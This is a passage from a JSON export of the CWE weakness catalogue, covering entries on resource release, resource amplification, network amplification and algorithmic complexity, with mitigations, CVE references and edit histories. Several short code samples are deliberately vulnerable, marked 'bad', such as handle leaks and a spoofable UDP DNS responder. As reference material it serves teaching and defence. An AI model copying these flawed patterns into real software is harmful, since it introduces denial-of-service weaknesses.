Relationships"}],"Previous_Entry_Name":[{"#text":"UNIX File Descriptor Leak","attr":{"@_Date":"2011-03-29"}},{"#text":"Exposure of File Descriptor to Unintended Control Sphere","attr":{"@_Date":"2013-02-21"}}]}},"404":{"attr":{"@_ID":"404","@_Name":"Improper Resource Shutdown or Release","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The program does not release or incorrectly releases a resource before it is made available for re-use.","Extended_Description":"When a resource is created or allocated, the developer is responsible for properly releasing the resource as well as accounting for all potential paths of expiration or invalidation, such as a set period of time or revocation.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"405","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"619","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Primary","Description":"Improper release or shutdown of resources can be primary to resource exhaustion, performance, and information confidentiality problems to name a few."},{"Ordinality":"Resultant","Description":"Improper release or shutdown of resources can be resultant from improper error handling or insufficient resource tracking."}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":["Availability","Other"],"Impact":["DoS: Resource Consumption (Other)","Varies by Context"],"Note":"Most unreleased resource issues result in general software reliability problems, but if an attacker can intentionally trigger a resource leak, the attacker might be able to launch a denial of service attack by depleting the resource pool."},{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"When a resource containing sensitive information is not correctly shutdown, it may expose the sensitive data in a subsequent allocation."}]},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-2"},"Method":"Automated Dynamic Analysis","Description":{"xhtml:p":["This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software\'s operation may slow down, but it should not become unstable, crash, or generate incorrect results.","Resource clean up errors might be detected with a stress-test by calling the software simultaneously from a large number of threads or processes, and look for evidence of any unexpected behavior. The software\'s operation may slow down, but it should not become unstable, crash, or generate incorrect results."]},"Effectiveness":"Moderate"},{"attr":{"@_Detection_Method_ID":"DM-12"},"Method":"Manual Dynamic Analysis","Description":"Identify error conditions that are not likely to occur during normal usage and trigger them. For example, run the program under low memory conditions, run with insufficient privileges or permissions, interrupt a transaction before it is completed, or disable connectivity to basic network services such as DNS. Monitor the software for any unexpected behavior. If you trigger an unhandled exception or similar error that was discovered and handled by the application\'s environment, it may still indicate unexpected conditions that were not handled by the application itself."}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-3"},"Phase":"Requirements","Strategy":"Language Selection","Description":{"xhtml:p":["Use a language that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","For example, languages such as Java, Ruby, and Lisp perform automatic garbage collection that releases memory for objects that have been deallocated."]}},{"Phase":"Implementation","Description":"It is good practice to be responsible for freeing all resources you allocate and to be consistent with how and where you free memory in a function. If you allocate memory that you intend to free upon completion of the function, you must be sure to free the memory at all exit points for that function including error conditions."},{"Phase":"Implementation","Description":"Memory should be allocated/freed using matching functions such as malloc/free, new/delete, and new[]/delete[]."},{"Phase":"Implementation","Description":"When releasing a complex object or structure, ensure that you properly dispose of all of its member components, not just the object itself."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-81"},"Intro_Text":"The following method never closes the new file handle. Given enough time, the Finalize() method for BufferReader should eventually call Close(), but there is no guarantee as to how long this action will take. In fact, there is no guarantee that Finalize() will ever be invoked. In a busy environment, the Operating System could use up all of the available file handles before the Close() function is called.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"private void processFile(string fName){}","xhtml:br":"","xhtml:div":{"#text":"BufferReader fil = new BufferReader(new FileReader(fName));String line;while ((line = fil.ReadLine()) != null){}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""],"xhtml:div":{"#text":"processLine(line);","attr":{"@_style":"margin-left:10px;"}}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"private void processFile(string fName){}","xhtml:br":"","xhtml:div":{"#text":"BufferReader fil = new BufferReader(new FileReader(fName));String line;while ((line = fil.ReadLine()) != null){}fil.Close();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""],"xhtml:div":{"#text":"processLine(line);","attr":{"@_style":"margin-left:10px;"}}}}}],"Body_Text":"The good code example simply adds an explicit call to the Close() function when the system is done using the file. Within a simple example such as this the problem is easy to see and fix. In a real system, the problem may be considerably more obscure."},{"attr":{"@_Demonstrative_Example_ID":"DX-82"},"Intro_Text":"This code attempts to open a connection to a database and catches any exceptions that may occur.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"try {}catch ( Exception e ) {}","xhtml:div":[{"#text":"Connection con = DriverManager.getConnection(some_connection_string);","attr":{"@_style":"margin-left:10px;"}},{"#text":"log( e );","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":""}},"Body_Text":"If an exception occurs after establishing the database connection and before the same connection closes, the pool of database connections may become exhausted. If the number of available connections is exceeded, other users cannot access this resource, effectively denying access to the application."},{"attr":{"@_Demonstrative_Example_ID":"DX-83"},"Intro_Text":"Under normal conditions the following C# code executes a database query, processes the results returned by the database, and closes the allocated SqlConnection object. But if an exception occurs while executing the SQL or processing the results, the SqlConnection object is not closed. If this happens often enough, the database will run out of available cursors and not be able to execute any more SQL queries.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C#"},"xhtml:div":{"#text":"...SqlConnection conn = new SqlConnection(connString);SqlCommand cmd = new SqlCommand(queryString);cmd.Connection = conn;conn.Open();SqlDataReader rdr = cmd.ExecuteReader();HarvestResults(rdr);conn.Connection.Close();...","xhtml:br":["","","","","","","",""]}}},{"attr":{"@_Demonstrative_Example_ID":"DX-84"},"Intro_Text":"The following C function does not close the file handle it opens if an error occurs. If the process is long-lived, the process can run out of file handles.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int decodeFile(char* fName) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char buf[BUF_SZ];FILE* f = fopen(fName, \\"r\\");if (!f) {}else {}fclose(f);return DECODE_SUCCESS;","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"printf(\\"cannot open %s\\\\n\\", fName);return DECODE_FAIL;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"while (fgets(buf, BUF_SZ, f)) {}","xhtml:div":{"#text":"if (!checkChecksum(buf)) {}else {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"return DECODE_FAIL;","attr":{"@_style":"margin-left:10px;"}},{"#text":"decodeBlock(buf);","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":""}}}]}}}}},{"attr":{"@_Demonstrative_Example_ID":"DX-85"},"Intro_Text":"In this example, the program does not use matching functions such as malloc/free, new/delete, and new[]/delete[] to allocate/deallocate the resource.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C++"},"xhtml:div":{"#text":"class A {};void A::foo(){}","xhtml:div":[{"#text":"void foo();","attr":{"@_style":"margin-left:10px;"}},{"#text":"int *ptr;ptr = (int*)malloc(sizeof(int));delete ptr;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}],"xhtml:br":""}}},{"attr":{"@_Demonstrative_Example_ID":"DX-86"},"Intro_Text":"In this example, the program calls the delete[] function on non-heap memory.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C++"},"xhtml:div":{"#text":"class A{};void A::foo(bool heap) {}","xhtml:div":[{"#text":"void foo(bool);","attr":{"@_style":"margin-left:10px;"}},{"#text":"int localArray[2] = {};int *p = localArray;if (heap){}delete[] p;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"11,22","attr":{"@_style":"margin-left:10px;"}},{"#text":"p = new int[2];","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":["","",""]}],"xhtml:br":""}}}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-1999-1127","Description":"Does not shut down named pipe connections if malformed data is sent.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1127"},{"Reference":"CVE-2001-0830","Description":"Sockets not properly closed when attacker repeatedly connects and disconnects from server.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0830"},{"Reference":"CVE-2002-1372","Description":"Return values of file/socket operations not checked, allowing resultant consumption of file descriptors.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1372"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Improper resource shutdown or release"},{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Unreleased Resource"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A9","Entry_Name":"Denial of Service","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO42-C","Entry_Name":"Close files when they are no longer needed","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM31-C","Entry_Name":"Free dynamically allocated memory when no longer needed","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"FIO04-J","Entry_Name":"Release resources when they are no longer needed"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP14","Entry_Name":"Failure to release resource"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"125"}},{"attr":{"@_CAPEC_ID":"130"}},{"attr":{"@_CAPEC_ID":"131"}},{"attr":{"@_CAPEC_ID":"494"}},{"attr":{"@_CAPEC_ID":"495"}},{"attr":{"@_CAPEC_ID":"496"}},{"attr":{"@_CAPEC_ID":"666"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 8: C++ Catastrophes.&#34; Page 143"}}},"Notes":{"Note":{"#text":"Overlaps memory leaks, asymmetric resource consumption, malformed input errors.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Common_Consequences, Likelihood_of_Exploit, Other_Notes, Potential_Mitigations, Relationship_Notes, Relationships, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Detection_Factors, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Functional_Areas, Likelihood_of_Exploit, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}]}},"405":{"attr":{"@_ID":"405","@_Name":"Asymmetric Resource Consumption (Amplification)","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Software that does not appropriately monitor or control resource consumption can lead to adverse system performance.","Extended_Description":"This situation is amplified if the software allows malicious users or attackers to consume more resources than their access level permits. Exploiting such a weakness can lead to asymmetric resource consumption, aiding in amplification attacks against the system or the network.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Operation"},{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":["DoS: Amplification","DoS: Resource Consumption (Other)"],"Note":"Sometimes this is a factor in \\"flood\\" attacks, but other types of amplification exist."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"An application must make resources available to a client commensurate with the client\'s access level."},{"Phase":"Architecture and Design","Description":"An application must, at all times, keep track of allocated resources and meter their usage appropriately."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Asymmetric resource consumption (amplification)"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A9","Entry_Name":"Denial of Service","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":41,"Entry_Name":"XML Attribute Blowup"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"TPS00-J","Entry_Name":"Use thread pools to enable graceful degradation of service during traffic bursts"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"FIO04-J","Entry_Name":"Release resources when they are no longer needed"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Common_Consequences, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Functional_Areas"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"406":{"attr":{"@_ID":"406","@_Name":"Insufficient Control of Network Message Volume (Network Amplification)","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not sufficiently monitor or control transmitted network traffic volume, so that an actor can cause the software to transmit more traffic than should be allowed for that actor.","Extended_Description":"In the absence of a policy to restrict asymmetric resource consumption, the application or system cannot distinguish between legitimate transmissions and traffic intended to serve as an amplifying attack on target systems. Systems can often be configured to restrict the amount of traffic sent out on behalf of a client, based on the client\'s origin or access level. This is usually defined in a resource allocation policy. In the absence of a mechanism to keep track of transmissions, the system or application can be easily abused to transmit asymmetrically greater traffic than the request or client should be permitted to.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"405","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Operation"},{"Phase":"Architecture and Design","Note":"If the application uses UDP, then it could potentially be subject to spoofing attacks that use the inherent weaknesses of UDP to perform traffic amplification, although this problem can exist in other protocols or contexts."},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":["DoS: Amplification","DoS: Crash, Exit, or Restart","DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)","DoS: Resource Consumption (Other)"],"Note":"System resources can be quickly consumed leading to poor application performance or system crash. This may affect network performance and could be used to attack other systems and applications relying on network performance."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":"An application must make network resources available to a client commensurate with the client\'s access level."},{"Phase":"Policy","Description":"Define a clear policy for network resource allocation and consumption."},{"Phase":"Implementation","Description":"An application must, at all times, keep track of network resources and meter their usage appropriately."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-113"},"Intro_Text":"This code listens on a port for DNS requests and sends the result to the requesting address.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Python"},"xhtml:div":{"#text":"sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)sock.bind( (UDP_IP,UDP_PORT) )while true:","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"data = sock.recvfrom(1024)if not data:(requestIP, nameToResolve) = parseUDPpacket(data)record = resolveName(nameToResolve)sendResponse(requestIP,record)","xhtml:br":["","","",""],"xhtml:div":{"#text":"break","attr":{"@_style":"margin-left:10px;"}}}}}},"Body_Text":"This code sends a DNS record to a requesting IP address. UDP allows the source IP address to be easily changed (\'spoofed\'), thus allowing an attacker to redirect responses to a target, which may be then be overwhelmed by the network traffic."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-1999-0513","Description":"Classic \\"Smurf\\" attack, using spoofed ICMP packets to broadcast addresses.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0513"},{"Reference":"CVE-1999-1379","Description":"DNS query with spoofed source address causes more traffic to be returned to spoofed address than was sent by the attacker.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1379"},{"Reference":"CVE-2000-0041","Description":"Large datagrams are sent in response to malformed datagrams.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0041"},{"Reference":"CVE-1999-1066","Description":"Game server sends a large amount.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1066"},{"Reference":"CVE-2013-5211","Description":"composite: NTP feature generates large responses (high amplification factor) with spoofed UDP source addresses.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5211"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Network Amplification"}},"Notes":{"Note":[{"#text":"This can be resultant from weaknesses that simplify spoofing attacks.","attr":{"@_Type":"Relationship"}},{"#text":"Network amplification, when performed with spoofing, is normally a multi-channel attack from attacker (acting as user) to amplifier, and amplifier to victim.","attr":{"@_Type":"Theoretical"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Enabling_Factors_for_Exploitation, Name, Other_Notes, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Enabling_Factors_for_Exploitation, Modes_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Network Amplification","attr":{"@_Date":"2008-10-14"}}}},"407":{"attr":{"@_ID":"407","@_Name":"Inefficient Algorithmic Complexity","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"An algorithm in a product has an inefficient worst-case computational complexity that may be detrimental to system performance and can be triggered by an attacker, typically using crafted manipulations that ensure that the worst case is being reached.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"405","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":["DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)","DoS: Resource Consumption (Other)"],"Note":"The typical consequence is CPU consumption, but memory consumption and consumption of other resources can also occur."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2003-0244","Description":"CPU consumption via inputs that cause many hash table collisions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0244"},{"Reference":"CVE-2003-0364","Description":"CPU consumption via inputs that cause many hash table collisions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0364"},{"Reference":"CVE-2002-1203","Description":"Product performs unnecessary processing before dropping an invalid packet.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1203"},{"Reference":"CVE-2001-1501","Description":"CPU and memory consumption using many wildcards.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1501"},{"Reference":"CVE-2004-2527","Description":"Product allows attackers to cause multiple copies of a program to be loaded more quickly than the program can detect that other copies are running, then exit. This type of error should probably have its own category, where teardown takes more time than initialization.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2527"},{"Reference":"CVE-2006-6931","Description":"Network monitoring system allows remote attackers to cause a denial of service (CPU consumption and detection outage) via crafted network traffic, aka a \\"backtracking attack.\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6931"},{"Reference":"CVE-2006-3380","Description":"Wiki allows remote attackers to cause a denial of service (CPU consumption) by performing a diff between large, crafted pages that trigger the worst case algorithmic complexity.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3380"},{"Reference":"CVE-2006-3379","Description":"Wiki allows remote attackers to cause a denial of service (CPU consumption) by performing a diff between large, crafted pages that trigger the worst case algorithmic complexity.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3379"},{"Reference":"CVE-2005-2506","Description":"OS allows attackers to cause a denial of service (CPU consumption) via crafted Gregorian dates.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2506"},{"Reference":"CVE-2005-1792","Description":"Memory leak by performing actions faster than the software can clear them.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1792"}]},"Functional_Areas":{"Functional_Area":"Cryptography"},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Algorithmic 